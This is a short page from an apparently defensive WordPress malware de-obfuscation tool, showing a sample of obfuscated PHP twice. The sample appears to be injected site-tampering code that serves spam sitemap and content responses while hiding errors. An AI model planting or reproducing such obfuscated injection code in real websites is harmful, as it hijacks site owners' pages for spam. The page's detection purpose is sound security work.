De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; if (strpos($var02, "allsitemap.xml")) { $var17 = func2($var08, $arr1); header("Content-type:text/xml"); echo $var17; exit; } if (strpos($var02, $O[59] . $O[9] . $O[15] . $O[9])) { $var21 = explode($O[55], $var02); $var21 = $var21[count($var21) - 1]; $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21); } else { $var21 = str_replace($O[63], "", $var02); $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21); } $arr1[$O[1] . $O[8] . $O[3] . $O[12]] = $var21; $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[11] . $O[7] . $O[4] . $O[2] . $O[25] . $O[10] . $O[9]; $var22 = func2($var10, $arr1); if ($var22 == '1') { $var17 = func2($var08, $arr1); header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]); echo $var17; exit; } $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[1] . $O[8] . $O[3] . $O[12] . $O[11]; $ooooooOOoOoOoooOOOooooOOoOoOO = func2($var10, $arr1); if (strpos($var02, $O[25] . $O[10] . $O[9]) > 0 || $ooooooOOoOoOoooOOOooooOOoOoOO == '1') { $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[3] . $O[10] . $O[24] . $O[12] . $O[52] . $O[20] . $O[25] . $O[18]; $var22 = func2($var10, $arr1); header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]); echo $var22; exit; }
<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; if (strpos($var02, "allsitemap.xml")) { $var17 = func2($var08, $arr1); header("Content-type:text/xml"); echo $var17; exit; } if (strpos($var02, $O[59] . $O[9] . $O[15] . $O[9])) { $var21 = explode($O[55], $var02); $var21 = $var21[count($var21) - 1]; $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21); } else { $var21 = str_replace($O[63], "", $var02); $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21); } $arr1[$O[1] . $O[8] . $O[3] . $O[12]] = $var21; $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[11] . $O[7] . $O[4] . $O[2] . $O[25] . $O[10] . $O[9]; $var22 = func2($var10, $arr1); if ($var22 == '1') { $var17 = func2($var08, $arr1); header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]); echo $var17; exit; } $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[1] . $O[8] . $O[3] . $O[12] . $O[11]; $ooooooOOoOoOoooOOOooooOOoOoOO = func2($var10, $arr1); if (strpos($var02, $O[25] . $O[10] . $O[9]) > 0 || $ooooooOOoOoOoooOOOooooOOoOoOO == '1') { $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[3] . $O[10] . $O[24] . $O[12] . $O[52] . $O[20] . $O[25] . $O[18]; $var22 = func2($var10, $arr1); header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]); echo $var22; exit; }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.